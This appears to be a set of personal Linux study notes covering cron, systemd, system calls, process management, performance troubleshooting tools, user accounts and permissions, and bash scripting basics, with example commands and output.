      52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
      #
    
  • Each user can have their own crontab file. These files are usually stored in /var/spool/cron/crontabs

  • To edit and install a crontab, run crontab -e

  • To list your crontabs, run crontab -l

  • To remove a crontab, you can run crontab -r

  • The /etc/crontab file is the system-wide crontab.

Bash Startup Files

In bash, you can choose from one of 4 startup files to place configuration you want to run at user login: 1) .bash_profile 2) .profile 3) .bash_login 4) .bashrc

Which one should you use?

It’s recommended that you have a single .bashrc file with a symbolic link for .bash_profile pointing to the .bashrc file.

Login Shells

A login shell is typically what you get when you first login to a system. The same is true for when you ssh to a system. You can tell if you are using a login shell by typing in echo $0 at the shell. If you receive a - in the response, you are using a login shell. The basic idea is that the login shell is the initial shell. When bash runs as a login shell, it runs /etc/profile. This is a global profile file that applies to any user. It then looks for one of the four user-specific profile files mentioned above. It will run the first one that it sees.

Non-login shells

Graphical user environments such as GNOME start-up in non-login shells, unless you specifically ask for a login shell. Upon starting a non-login shell, bash runs /etc/bash.bashrc and then runs the users .bashrc

Troubleshooting Storage

  • Disk I/O can be observed using biosnoop

System Calls

  • The kernel implements a programming interface for users of the system called the ‘system call’ interface. Users and programs interact with the OS through its system call interface.

Common System Calls

fork

  • fork - Used to create a process. At the time of the fork, the child process inherits it’s execution state from the parent. This execution state includes the parent’s address space contents, CPU register values, and any system resources it has allocated. The OS also creates a new process control struct (task struct), an OS data structure for managing the child process, and it assigns the child process a PID.
  • When the child process is first scheduled to run on the CPU, it starts executing where the parent process left off, at the return from the fork call.
  • From a programmer’s point of view, a call to fork returns twice. Once in the context of the running parent process, and once in the context of the running child process. In order to different the return values, a call to fork returns different values to the parent and child. The value returned to the parent is the PID of the child (or -1 if the fork fails), and the value returned to the child is always 0.
  • Example fork code:
#include <stdio.h>
#include <sys/types.h>;
#include <unistd.h>;
int main()
{
 
    // make two process which run same
    // program after this instruction
    fork();
 
    printf("Hello world!\n");
    return 0;
}`

exec

  • exec - Unix provides a family of exec system calls that trigger the OS to overlay the calling process’s image with a new image from a binary executable file.
  • Example:
#include <unistd.h>
 
int main(void) {
  char *programName = "ls";
  char *args[] = {programName, "-lh", "/home", NULL};
 
  execvp(programName, args);
 
  return 0;
}

exit and wait

  • exit - to terminate, a process calls the exit syscall, which triggers the OS to clean up most of the processes execution state. After running the exit code, a process notifies it’s parent that it has exited. The parent is responsible for cleaning up the child’s remaining state from the system.
  • After executing the exit syscall, the OS delivers a SIGCHLD signal to the process’s parent process to notify it that its child has exited. The child then becomes a zombie process; it moves to the Exited state and can no longer run on the CPU. The execution state of a zombie process is partially cleaned up but the OS still maintains a little information about it, including about how it terminated. A parent process reaps its zombie child by calling the wait syscall.

System Wide Analysis

These tools examine system-wide analysis in the context of system software or hardware resources, using kernel counters:

  1. vmstat - virtual and physical memory statistics
  2. mpstat - per-cpu usage
  3. iostat - Per-disk I/O usage, reported from the block device interface
  4. nstat - TCP/IP stack statistics
  5. sar - various statistics; can also archive them for historical reporting

Systemd

  • systemd is goal-oriented. These goals are defined as ‘units’

  • Units are systemd objects used for organizing boot and maintenance tasks. Units consist of mounts, services, sockets, devices, and timers, etc.

  • There are 11 unit types

    • Services units tells the init system what it needs to know about the life cycle of an application
    • systemd is the init system typically
    • Use systemctl cat sshd.service to view the unit file for a service
    • Use systemctl edit --full sshd.service to edit a unit file
    • use systemctl revert sshd.service to revert the unit file to the default
  • To prevent a service from being started, you can mask it

    • systemctl mask sshd.service
  • Targets are simply logical collections of units.

    • Target files end in the .target extension.

    • Systemd includes several predefined targets:

      • halt: shuts down and halts the system
      • poweroff: shuts down and powers off the system
      • shutdown: shuts down the system
      • rescue: boots into single user mode for recovery. All local file systems are mounted. Networking is disabled. Some essential services are started
      • emergency: Runs an emergency shell. The root file system is mounted in read-only mode, other file systems are not mounted. Network and other services are disabled
      • multi-user: full network support, but without a GUI
      • graphical: full network support with a GUI
      • reboot: shuts down and reboots the system
      • default: a special soft link that points to the default system boot target (multi-user or graphical)
      • hibernate: Puts the system into hibernation
    • systemctl get-default will show you the default target

    • use systemctl set-default multi-user.target to set the default operating mode, then reboot

    • Useful targets:

    • emergency.target = root file system is read-only. Minimal amount of programs loaded

    • rescue.target = a few services are loaded and you are dropped into a root shell

      • You must have a password set for the root user to use either of these operating modes
    • You can switch to a target without booting by typing systemctl isolate graphical.target, but this does not change the default boot target

  • Each unit has its own config file

  • When you boot a system, you’re activating a default unit, usually a target unit called default.target that groups together a number of service and mount units as dependencies.

  • There are two main directories that store systemd unit files:

    • /lib/systemd/system or /usr/lib/system/system - system unit directory (avoid making changes. The operating system will maintain these files for you.)
    • /etc/systemd/system - system configuration directory (make changes here)
    • You can check the current systemd configuration search path with this command: systemctl -p UnitPath show
  • You can interact with systemd using the systemctl command

  • One of systemds features is the ability to delay a daemon startup until it is absolutely needed

  • While upgrading software, if systemd’s components are upgraded, you will typically need to reboot

Systemd example

Let’s create a simple echo service

First, define a socket (create a file named echo.socket in /etc/systemd/system)::

[Unit]
Description=my echo socket

[Socket]
ListenStream=8081
Accept=true

Next, define a service for echoing a response (create a file named echo@.service in /etc/systemd/system):

[Unit]
Description=my echo service

[Service]
ExecStart=/bin/cat
StandardInput=socket

Now, we need to start the socket we created in step 1.

systemctl start echo.socket

We can get the status of our socket:

ryan:system/ $ sudo systemctl status echo.socket
● echo.socket - my echo socket
     Loaded: loaded (/etc/systemd/system/echo.socket; static)
     Active: active (listening) since Tue 2023-01-17 06:02:51 EST; 7s ago
     Listen: [::]:8081 (Stream)
   Accepted: 0; Connected: 0;
      Tasks: 0 (limit: 38033)
     Memory: 8.0K
        CPU: 911us
     CGroup: /system.slice/echo.socket

Jan 17 06:02:51 xerxes systemd[1]: Listening on my echo socket.

Now you can connect to the socket and see it repeat whatever you say!

ryan:system/ $ nc localhost 8081
hello
hello
nice day, isn't it?
nice day, isn't it?

The first 60 seconds

Uptime - Load averages to identify is load is decreasing or increasing over 1, 5, and 15 minute averages dmesg -T | tail - Kernel errors including OOM events vmstat -SM 1 - System-wide statistics: run queue length, swapping, overall CPU usage mpstat -P ALL 1 - Per-CPU balance: a single busy CPU can indicate poor thread scaling pidstat 1 - Per-process CPU usage: identify unexpected CPU consumers, and user/system CPU time for each process. iostat -sxz 1 - Disk I/O statistics: IOPS and throughput, average wait time, percent busy. free -m - Memory usage including the file system cache sar -n DEV 1 - Network device I/O: packets and throughput sar -n TCP,ETCP 1 - TCP statistics: connectionrates, retransmits top - check overview

time

System time and the hardware clock

  • The kernel maintains the system clock, which is the clock that is consulted when you run commands like date. You can also update the system clock using the date command. However, you shouldn’t as you will never get the time exactly right.
  • PC hardware has a battery backed Real Time Clock (RTC). The kernel usually sets it’s time based on the RTC at boot. You can reset the system time to the current time of the RTC using hwclock. Keep your hardware clock in UTC to avoid any trouble with time zones or daylight savings time. You can set the RTC to your Kernel’s UTC clock using this command: hwclock --systohc --utc
  • The kernel is very bad at keeping time. Because Linux systems will go days, months, or even years on a single boot, they typically will experience time drift. Becuase of this, you should configure the system clock to use NTP
  • The kernel’s system clock represents the current time as the number of seconds since 12 AM Midnight, January 1st 1970 UTC. To see this number at the moment, run date +%s
  • The time zone files on your system are in /usr/share/zoneinfo

Network Time Protocol (NTP)

  • NTP client services were once handled by an NTP daemon, but systemd has long since replaced this with a package named timesyncd.
  • timesyncd can be controlled using /etc/systemd/timesyncd.conf
  • If your machine does not have a persistent internet connection, you can use a daemon like chronyd to maintain the time during disconnects

troubleshooting

Measure CPU time of a process

We can measure CPU time using time. Be aware that there are two implementations of time, and you may be running the wrong one. There is a bash built-in named time, which does not provide extensive statistics. You want to use the time utility at /usr/bin/time. Run which time to see which one you are using.

ryan:// $ time httping -delay 2 www.google.com
Time				Count	Url				Result		Time		Headers
-----				-----	---				------		----		-------
[ 2023-01-21T09:29:49-05:00 ]	[ 0 ]	[ https://www.google.com ]	[ 200 OK ]	[ 136ms ]	[  :  ]
[ 2023-01-21T09:29:52-05:00 ]	[ 1 ]	[ https://www.google.com ]	[ 200 OK ]	[ 111ms ]	[  :  ]
[ 2023-01-21T09:29:54-05:00 ]	[ 2 ]	[ https://www.google.com ]	[ 200 OK ]	[ 105ms ]	[  :  ]
^C
Total Requests: 2

real	0m6.384s
user	0m0.000s
sys	0m0.021s
  • Real time - represents the total time the application spent running. This is the user time + system (kernel) time + time spent waiting (the process could be waiting of various things… waiting for CPU time, waiting on network resources, etc.)
  • User time - represents the time the CPU spent running the program itself
  • Sys time - represents the time the Kernel spent doing the process’s work (for example, reading files and directories)

You can determine how much time the process spent waiting by substracting the user and sys times from the real time: real - (user + sys) = time waiting. You can see in the example above we spent ~6 seconds waiting, in this case we were waiting on network resources.

Measuring and troubleshooting load average

You can use uptime to get the overall load average of the system:

ryan:wc/ $ uptime
 09:43:44 up 5 days,  4:34,  1 user,  load average: 0.27, 0.36, 0.29
                                                       ^     ^     ^
                                                       |     |     |
                                                       |     |     -- 15 minutes
                                                       |     --------- 5 minutes
                                                       --------------- 1 minute

uptime shows the overall time since the last reboot. It also shows load averages over 1 minutes, 5 minutes, and 15 minutes, respectively.

If a load average goes up to around 1, a single process is likely using all of that CPU. With multi-core/processor systems, if a load average goes up to 2 (or more), this means that all cores have just enough to do all of the time. To troubleshoot processes, use `top` or (preferably) `htop`. Processes consuming more CPU than other's will typically rise to the top of the list.

A high load average doesn't necessarily mean there is a problem. If you see a high load average, but your system is responding well, don't panic. The system just has a lot of processes sharing the CPU. On servers with high compute demands (such as web servers or servers that serve in scientific computations), processes and threads are being started and stopped so quickly that the load averages will be skewed and innacurate. However, if a load average is high and the system performance is suffering, you are likely running into memory problems. When a system is low on memory, it will start to thrash, or rapidly swap pages to and from disk. This is less of a problem on modern systems using solid state storage such as SSDs or NVMe. On traditional systems with spinning media, this can be an issue.

Measuring and troubleshooting memory

One of the simplest ways to view memory status on your system is to use the `free` command or view `/proc/meminfo`

You can also use vmstat to view memory performance on a system. vmstat is one of the oldest utilities for this purpose. It has minimal overhead and is a no-frills kind of program. The output is a bit difficult to read for those who are unfamiliar. You can use it to see how often the kernel is swapping pages in and out, how busy the CPU is, and how I/O resources are being utilized. To use it, run vmstat 2 (with 2 being the seconds in between updating the screen)

ryan:todo$ vmstat 2
procs -----------memory---------- ---swap-- -----io---- -system-- ------cpu-----
 r  b   swpd   free   buff  cache   si   so    bi    bo   in   cs us sy id wa st
 2  0      0 23791304 233996 4724548    0    0    30    30   10  237  5  1 94  0  0
 0  0      0 23807492 233996 4704048    0    0     0   164 2571 3426  2  2 96  0  0
 0  0      0 23806096 234004 4703776    0    0     0    34  586 1424  1  0 99  0  0
 0  0      0 23808876 234004 4703968    0    0     0    70  522 1152  1  0 99  0  0
 0  0      0 23816764 234004 4696736    0    0     0     0  591 1293  1  0 99  0  0

Users and User Management

At the kernel level, Linux users are just numbers (UIDs), but to make working with users easier, we assign usernames to these numbers. Usernames only exist in user-space. Because of this, any program that wants to work with users on a Linux system will need to translate these usernames to UIDs.

/etc/passwd

The plantext /etc/passwd file contains entries for every user on a system. Each line represents a user and has 7 fields seperated by colons:

  1. the username
  2. the encrypted password for the user (this is no longer used, replaced by /etc/shadow). An x in this field indicates that the password is stored in /etc/shadow. An asterisk * indicates that the user cannot login. If the password field is blank (i.e. you see double colons ::), no password is required to login to this account.
  3. The user Id
  4. The group Id for the user (this field should correspond to one of the numbered entries in the /etc/group file)
  5. The user’s real name (aka the GECOS field)
  6. The user’s home directory
  7. The user’s login shell

/etc/shadow

Contains encrypted passwords for user accounts

Special User’s

You’ll find a few special users on a Linux system:

  1. root - always has UID 0 and GID 0
  2. daemon - never has login privileges
  3. nobody - an underprivileged user. Some processes run as nobody because they cannot write to anything on the system

Changing a password

Becuase /etc/passwd is just a text file, you can technically modify it directly to change a user’s password. However, you shouldn’t do this. Instead, you can use the passwd command to change a password for a user. If for some reason you cannot use passwd, you should opt to use vipw. This command will prevent race conditions when modifying the /etc/passwd file. It also creates a backup of the file.

SUID

When you temporarily switch to another user, all you are really doing is changing your user Id. There are two ways to do this, and the kernel handles both. The first way to with a setuid executable (sudo) and the second way is with a setuid system call. The kernel has basic rules about what a process can or can’t do, but here are the three essentials that cover setuid executables and system calls:

  1. A process can run a setuid executable as long as it has adequate file permissions
  2. A process running as root (user ID 0) can use setuid() system calls to become any other user
  3. A process not running as root has severe restrictions on how it may use setuid() system calls. In most cases, it cannot.

Because of these rules, you often need a combination of setuid executables and system calls to run a process as another user. For example, sudo has setuid root and once running, it may use setuid() syscalls to become another user.

Effictive UID (euid), Real UID (ruid), and Saved UID (saved UID)

Every process has more than one user Id. The effective user Id is the one you are likely familiar with. This is the user Id that the process is currently running as. However, the process also has a real user Id, which indicates who started the process. Normally, these two values are the same. However, when you execute a setuid program, Linux sets the euid (effective UID) to the ID of the running user, but keeps the original user Id in the ruid (real user Id). Processes also have a saved UID, but we will not need to work with this often.

As stated above, most processes have the same EUID and RUID. As a result, the default output for the `ps` command and other system diagnostic programs only show the EUID. To view both the EUID and RUID, you can run:

ps -eo pid,euser,ruser,comm

Bash

Directory Map

bash notes

Variables

Special Variables

  • $0 - The name of the Bash script.
  • $1 - $9 - The first 9 arguments to the Bash script.
  • $# - How many arguments were passed to the Bash script.
  • $@ - All the arguments supplied to the Bash script.
  • $? - The exit status of the most recently run process.
  • $$ - The process ID of the current script.
  • $USER - The username of the user running the script.
  • $HOSTNAME - The hostname of the machine the script is running on.
  • $SECONDS - The number of seconds since the script was started.
  • $RANDOM - Returns a different random number each time is it referred to.
  • $LINENO - Returns the current line number in the Bash script.`

Input

Command Line Input

#!/bin/bash
# A simple copy script
cp $1 $2
# Let's verify the copy worked
echo Details for $2
ls -lh $2

Input in scripts

If we would like to ask the user for input in a script, we use a command called read. This command takes the input and will save it into a variable.

#!/bin/bash
# Ask the user for their name
echo Hello, who am I talking to?
read varname
echo It\'s nice to meet you $varname

You are able to alter the behaviour of read with a variety of command line options. (See the man page for read to see all of them.) Two commonly used options however are -p which allows you to specify a prompt and -s which makes the input silent. This can make it easy to ask for a username and password combination like the example below:

#!/bin/bash
# Ask the user for login details
read -p 'Username: ' uservar
read -sp 'Password: ' passvar
echo
echo Thankyou $uservar we now have your login details

You can use read to get multiple variables as well:

#!/bin/bash
# Demonstrate how read actually works
echo What cars do you like?
read car1 car2 car3
echo Your first car was: $car1
echo Your second car was: $car2
echo Your third car was: $car3

Input from stdin

#!/bin/bash
# A basic summary of my sales report
echo Here is a summary of the sales data:
echo ====================================
echo
cat /dev/stdin | cut -d' ' -f 2,3 | sort

Arithmetic

let

let is a builtin function of Bash that allows us to do simple arithmetic. It follows the basic format:

#!/bin/bash
# Basic arithmetic using let
let a=5+4
echo $a # 9
let "a = 5 + 4"
echo $a # 9
let a++
echo $a # 10
let "a = 4 * 5"
echo $a # 20
let "a = $1 + 30"
echo $a # 30 + first command line argument

Here is a table with some common operations:

OperatorOperation
+, -, *, /addition, subtraction, multiply, divide
var++Increase the variable var by 1
var–Decrease the variable var by 1
%Modulus (Return the remainder after division)

Conditionals

If statements (and, closely related, case statements) allow us to make decisions in our Bash scripts. They allow us to decide whether or not to run a piece of code based upon conditions that we may set. If statements, combined with loops (which we’ll look at in the next section) allow us to make much more complex scripts which may solve larger tasks.

If Statements

if [ <some test> ]
then
  <commands>
fi

Anything between then and fi (if backwards) will be executed only if the test (between the square brackets) is true.

Let’s look at a simple example:

#!/bin/bash
if [ $1 -gt 100 ]
then
  echo Hey that\'s a large number.
  pwd
fi
date
03:54:59 ryan@localhost $./test.sh 134
Hey that's a large number.
/repos/PersonalProjects/shell
Tue Jan 17 15:55:03 EST 2023

The square brackets [] in the if statement above are actually a reference to the test command. This means that all of the operators that test allows may be used here as well.

if/elif/else

#!/bin/bash
# elif statements
if [ $1 -ge 18 ]
then
  echo You may go to the party.
elif [ $2 == 'yes' ]
then
  echo You may go to the party but be back before midnight.
else
  echo You may not go to the party.
fi

case statements

Sometimes we may wish to take different paths based upon a variable matching a series of patterns. We could use a series of if and elif statements but that would soon grow to be unweildly. Fortunately there is a case statement which can make things cleaner. It’s a little hard to explain so here are some examples to illustrate:

#!/bin/bash
# case example
case $1 in
  start)
    echo starting
    ;;
  stop)
    echo stoping
    ;;
  restart)
    echo restarting
    ;;
  *)
    echo don\'t know
    ;;
esac

Loops

while loops

#!/bin/bash

# Basic while loop

counter=1
while [ $counter -le 10 ]
do
  echo $counter
  ((counter++))
done
echo All done

until loop

#!/bin/bash

# Basic until loop

counter=1
until [ $counter -gt 10 ]
do
  echo $counter
  ((counter++))
done
echo All done

Moving the cursor:

Moving the cursor:

  Ctrl + a   Go to the beginning of the line (Home)
  Ctrl + e   Go to the End of the line (End)
  Ctrl + p   Previous command (Up arrow)
  Ctrl + n   Next command (Down arrow)
   Alt + b   Back (left) one word
   Alt + f   Forward (right) one word
  Ctrl + f   Forward one character
  Ctrl + b   Backward one character
  Ctrl + xx  Toggle between the start of line and current cursor position

Editing:

 Ctrl + L   Clear the Screen, similar to the clear command

  Alt + Del Delete the Word before the cursor.
  Alt + d   Delete the Word after the cursor.
 Ctrl + d   Delete character under the cursor
 Ctrl + h   Delete character before the cursor (Backspace)

 Ctrl + w   Cut the Word before the cursor to the clipboard.
 Ctrl + k   Cut the Line after the cursor to the clipboard.
 Ctrl + u   Cut/delete the Line before the cursor to the clipboard.

  Alt + t   Swap current word with previous
 Ctrl + t   Swap the last two characters before the cursor (typo).
 Esc  + t   Swap the last two words before the cursor.

 ctrl + y   Paste the last thing to be cut (yank)
  Alt + u   UPPER capitalize every character from the cursor to the end of the current word.
  Alt + l   Lower the case of every character from the cursor to the end of the current word.
  Alt + c   Capitalize the character under the cursor and move to the end of the word.
  Alt + r   Cancel the changes and put back the line as it was in the history (revert).
 ctrl + _   Undo

 TAB        Tab completion for file/directory names
For example, to move to a directory 'sample1'; Type cd sam ; then press TAB and ENTER.
type just enough characters to uniquely identify the directory you wish to open.

Special keys: Tab, Backspace, Enter, Esc

Text Terminals send characters (bytes), not key strokes.
Special keys such as Tab, Backspace, Enter and Esc are encoded as control characters.
Control characters are not printable, they display in the terminal as ^ and are intended to have an effect on applications.

Ctrl+I = Tab
Ctrl+J = Newline
Ctrl+M = Enter
Ctrl+[ = Escape

Many terminals will also send control characters for keys in the digit row:
Ctrl+2 → ^@
Ctrl+3 → ^[ Escape
Ctrl+4 → ^\
Ctrl+5 → ^]
Ctrl+6 → ^^
Ctrl+7 → ^_ Undo
Ctrl+8 → ^? Backward-delete-char

Ctrl+v tells the terminal to not interpret the following character, so Ctrl+v Ctrl-I will display a tab character,
similarly Ctrl+v ENTER will display the escape sequence for the Enter key: ^M

History:

  Ctrl + r   Recall the last command including the specified character(s).
             searches the command history as you type.
             Equivalent to : vim ~/.bash_history.
  Ctrl + p   Previous command in history (i.e. walk back through the command history).
  Ctrl + n   Next command in history (i.e. walk forward through the command history).

  Ctrl + s   Go back to the next most recent command.
             (beware to not execute it from a terminal because this will also launch its XOFF).
  Ctrl + o   Execute the command found via Ctrl+r or Ctrl+s
  Ctrl + g   Escape from history searching mode
        !!   Repeat last command
       !n    Repeat from the last command: args n e.g. !:2 for the second argumant.
       !n:m  Repeat from the last command: args from n to m. e.g. !:2-3 for the second and third.
       !n:$  Repeat from the last command: args n to the last argument.
       !n:p  Print last command starting with n
     !string Print the last command beginning with string.
       !:q   Quote the last command with proper Bash escaping applied.
              Tip: enter a line of Bash starting with a # comment, then run !:q on the next line to escape it.
        !$   Last argument of previous command.
   ALT + .   Last argument of previous command.
        !*   All arguments of previous command.
^abc­^­def   Run previous command, replacing abc with def

Process control:

 Ctrl + C   Interrupt/Kill whatever you are running (SIGINT).
 Ctrl + l   Clear the screen.
 Ctrl + s   Stop output to the screen (for long running verbose commands).
            Then use PgUp/PgDn for navigation.
 Ctrl + q   Allow output to the screen (if previously stopped using command above).
 Ctrl + D   Send an EOF marker, unless disabled by an option, this will close the current shell (EXIT).
 Ctrl + Z   Send the signal SIGTSTP to the current task, which suspends it.
            To return to it later enter fg 'process name' (foreground).

Commands

Directory Map

chgrp

chgrp can be used to change the owning group of a file or directory

Chmod

Chmod is used to manage permissions (mode) on a file or directory

The syntax of the chmod command when using the symbolic mode has the following format:

chmod [OPTIONS] NUMBER FILE...

When using the numeric mode, you can set the permissions for all three user classes (owner, group, and all others) at the same time.

The permission number can be a 3 or 4-digits number. When 3 digits number is used, the first digit represents the permissions of the file’s owner, the second one the file’s group, and the last one all other users.

Each write, read, and execute permissions have the following number value:

  • r (read) = 4
  • w (write) = 2
  • x (execute) = 1
  • no permissions = 0

The permissions number of a specific user class is represented by the sum of the values of the permissions for that group.

To find out the file’s permissions in numeric mode, simply calculate the totals for all users’ classes. For example, to give read, write and execute permission to the file’s owner, read and execute permissions to the file’s group and only read permissions to all other users, you would do the following:

  • Owner: rwx=4+2+1=7
  • Group: r-x=4+0+1=5
  • Others: r-x=4+0+0=4

Using the method above, we come up to the number 754, which represents the desired permissions.

When the 4 digits number is used, the first digit has the following meaning:

  • setuid=4
  • setgid=2
  • sticky=1
  • no changes = 0

The next three digits have the same meaning as when using 3 digits number.

If the first digit is 0 it can be omitted, and the mode can be represented with 3 digits. The numeric mode 0755 is the same as 755.

To calculate the numeric mode, you can also use another method (binary method), but it is a little more complicated. Knowing how to calculate the numeric mode using 4, 2, and 1 is sufficient for most users.

You can check the file’s permissions in the numeric notation using the stat command:

stat -c "%a" file_name

Here are some examples of how to use the chmod command in numeric mode:

  • Give the file’s owner read and write permissions and only read permissions to group members and all other users:

chmod 644 dirname

  • Give the file’s owner read, write and execute permissions, read and execute permissions to group members and no permissions to all other users:

chmod 750 dirname

  • Give read, write, and execute permissions, and a sticky bit to a given directory:

chmod 1777 dirname

  • Recursively set read, write, and execute permissions to the file owner and no permissions for all other users on a given directory:

chmod -R 700 dirname

chown

chown can be used to change the owning user

dd

  • dd is useful when working with block and character devices
  • dd’s sole purpose is to read from an input file or stream and write to an output file or stream
  • dd copies data in blocks of a fixed size

example usage

dd if=/dev/zero of=new_file bs=1024 count=1

the dd command syntax differs from most other unix style commands. It is based on an old IBM job control language (JCL) style.

groups

groups can be used to view what group memberships a user has

ip

Show IP stack Info

Example

$ ip addr
1: lo:  mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
      valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
      valid_lft forever preferred_lft forever
2: eth0:  mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:22:48:27:87:eb brd ff:ff:ff:ff:ff:ff
    inet 172.16.1.4/24 brd 172.16.1.255 scope global noprefixroute eth0
      valid_lft forever preferred_lft forever
    inet6 fe80::222:48ff:fe27:87eb/64 scope link
      valid_lft forever preferred_lft forever
3: enP12806s1:  mtu 1500 qdisc mq master eth0 state UP group default qlen 1000
    link/ether 00:22:48:27:87:eb brd ff:ff:ff:ff:ff:ff

Job Control

Normally, when you start a command in a shell, you don’t get the shell prompt back until the program finishes executing. You can detach a process from the shell using the ampersand (&), which will send it to the background.

You can use jobs to view currently running background jobs. You can use fg <pid> to bring a background process back to the foreground.

Kill

kill can be used to kill a process

Usage/Output

$ kill 22541
[1]+  Terminated              sleep 60

Commonly Used Options

  • Kill can be used without any options. However, you can also specify what signal to use:
$ kill -l
 1) SIGHUP       2) SIGINT       3) SIGQUIT      4) SIGILL       5) SIGTRAP
 6) SIGABRT      7) SIGBUS       8) SIGFPE       9) SIGKILL     10) SIGUSR1
11) SIGSEGV     12) SIGUSR2     13) SIGPIPE     14) SIGALRM     15) SIGTERM
16) SIGSTKFLT   17) SIGCHLD     18) SIGCONT     19) SIGSTOP     20) SIGTSTP
21) SIGTTIN     22) SIGTTOU     23) SIGURG      24) SIGXCPU     25) SIGXFSZ
26) SIGVTALRM   27) SIGPROF     28) SIGWINCH    29) SIGIO       30) SIGPWR
31) SIGSYS      34) SIGRTMIN    35) SIGRTMIN+1  36) SIGRTMIN+2  37) SIGRTMIN+3
38) SIGRTMIN+4  39) SIGRTMIN+5  40) SIGRTMIN+6  41) SIGRTMIN+7  42) SIGRTMIN+8
43) SIGRTMIN+9  44) SIGRTMIN+10 45) SIGRTMIN+11 46) SIGRTMIN+12 47) SIGRTMIN+13
48) SIGRTMIN+14 49) SIGRTMIN+15 50) SIGRTMAX-14 51) SIGRTMAX-13 52) SIGRTMAX-12
53) SIGRTMAX-11 54) SIGRTMAX-10 55) SIGRTMAX-9  56) SIGRTMAX-8  57) SIGRTMAX-7
58) SIGRTMAX-6  59) SIGRTMAX-5  60) SIGRTMAX-4  61) SIGRTMAX-3  62) SIGRTMAX-2
63) SIGRTMAX-1  64) SIGRTMAX
$ sleep 60 &
[1] 22661
$ kill -s 9 22661
[1]+  Killed                  sleep 60

  • If you do not specify a signal, SIGTERM (15) is used
  • You can stop a process (it will still reside in memory) with signal 19, and resume it with signal 18
  • All signals except for SIGKILL (9) can be ignored. SIGKILL does not give a process the change to clean up after itself or finish work. The kernel immediately terminates the process and forcibly removes it from memory.

lsscsi

  • can be used to walk the SCSI device paths provided by sysfs
  • not installed on most systems by default

passwd

Can be used to manipulate user passwords

Example: passwd ryan

ps

ps is used for viewing process status

Usage/Output

$ ps
PID        TTY     STAT   TIME          CMD
5140     pts/4    Ss        00:00:00     bash
61244    pts/4    R+        00:00:00     ps
  • PID = the process Id
  • TTY = the terminal device where the process is running
  • STAT = the current status of the process. It can be ‘s’ for sleeping, ‘r’ for running. See the man page ps(1) for more info
  • TIME = the CPU time that the process has used. Note that this is different than the ‘wall-clock’ time
  • CMD = the command used to start the process

Commonly Used Options

There are many options available to the ps command. To make things more confusing, you can specify options in 3 different styles - Unix, BSD, and GNU. Most people use the BSD style, as it is seemingly most comfortable to use (less typing).

Here are some of the most commonly used BSD-style options:

  • ps x = show all of your running processes
  • ps ax = show all processes on the system, not just those that you own
  • ps u = Include more detailed information on processes
  • ps w = show full command names, not just what fits on a single line
  • ps u $$ = status of the current process
  • ps aux = show all processes for all users with verbose detail

umask

See page 37

Greybeard Qualification

Directory Map

Block Devices and File Systems

Device Special Files

  • In Linux, everything is a File
  • /dev contains device files
  • mknod can be used to make a device file
    • Example: mknod mydevice b 1 1
  • udev manages devices, it creates the device files in the /dev directory

Memory Management

  • pmap <pid>
    • any line showing ‘anon’ memory is the heap
  • page tables are supported directly by the CPU and memory management unit (MMU)
  • The page table turns logical memory addresses into real RAM addresses
  • The kernel allocates pages
  • Pages are allocated and mapped when a program is loaded at run time
  • When a program needs more memory, allocate from the heap
  • Processes that need a shared library will all reference the same pages for that shared object in memory
  • If you don’t have enough memory available, pages are swapped out to disk
    • Create swap space with mkswap
    • Start with swapon
    • Any partition with type 82 will be allocated as swap type at boot
  • /proc/<pid>/smaps
    • Detailed information about paging for a process
  • ‘/proc/meminfo’
  • RSS: Resident set size
    • How much virtual memory is in real memory
  • Thrashing

Execution and Scheduling of Processes and Threads

How are processes made?

  • Processes are created with fork()
  • The new process created with fork() is an exact copy of its parent
    • Everything is copied from the parent except for file locks and any pending signals
    • the fork() system call has a return value of > 0 if you’re the parent, if you’re the child the value will be 0. If there is an error the return value will be less than 0.
    • fork() doesn’t copy all memory to the child at first. The child process shares the memory of the parent until the child or parent needs to write to the memory. Then the process that needs to modify the memory makes a copy of just that page and makes it’s change. This is called Copy On Write (COW).
    • On Linux, c libraries typically implement fork() by wrapping clone()

Daemon’s

  • Services / background processes
  • How to make a daemon:
    • Fork the parent process, then the parent exits, leaving the child process with parent init (pid=1)
    • Close all open file’s
    • Become the process group leader
      • a Process Group
    • Set the umask
    • Change dir to a safe place
    • Possibly ignore some signals

Process Scheduling

  • Priority determines which process gets to run
  • The kernel constantly has to decide which process to run next
  • Context switching involves moving register values out of the CPU and into memory, and loading registers for the next process to run
  • Every process has a task state associated with it. The states are:
    • TASK_RUNNING
      • Processes in the running state have a time quantum to run within. By default, 100ms.
      • The kernel checks the process time quantum every tick.
    • TASK_INTERRUPTABLE
    • TASK_UNINTERRUPTABLE
      • This is rare
    • TASK_STOPPED
    • TASK_TRACED
      • Example: tracing the process with strace
    • EXIT_ZOMBIE
    • EXIT_DEAD

Threads

  • a thread is a lightweight process
  • Threads of a process all run in the same memory address space
    • A thread has its own instruction pointer
    • The stack is not shared. Each has its own stack.
    • In linux all threads have their own PID
    • Threads will spin (spin-lock) if they are waiting to access memory that is locked by another thread
      • Processes that are spinning do not go to sleep or cede back to the kernel

Process Structure and IPC

What is a process?

  • A running program
  • Executable binary (ELF File)
  • A set of data structures in the kernel
    • This is the process itself
    • Helps the kernel keep track of resources used by the process (open files, mmap, etc.)
  • Unit to which the kernel allocates resources
  • Parts of a process:
    • PID
    • PPID
    • Open files
      • Array of file descriptors in task struct (0 is stdin, 1 is stdout, 2 is stderr, and so on…)
    • TTY (pseudo tty nowadays)
    • UID (a signed integer)
      • a process can change its UID by using setuid
    • GUID (a signed integer)
    • Priority (can be set with nice value (renice for already running processes))
    • limits (rlimit)
    • timestamps / counters
  • processes are defined as task_struct in sched.h of the source
  • What can you do with a process?
    • Create
    • Send a signal (kill)
    • Get information about (ps, pidof, etc.)

Process memory

  • Heap grows up
  • Stack grows down
  • Data section for initialized variables and data
  • malloc to allocate memory on the heap
  • free to free memory from the heap
  • You can see the mmap of a running process using pmap <pid>

Resource Limit’s

  • rlimits or ulimits (shell)
  • getrlimit() or setrlimit()
  • ulimit -a to view limits
  • Use to control users, processes
  • Usage is not common these days
  • Default limits exist
  • stored in /etc/security/limits.conf

Process Priority

  • Set nice value with nice command
  • nice() system call
  • a regular user can only increase the nice value (decreasing its priority)
  • in all cases, higher number means lower priority
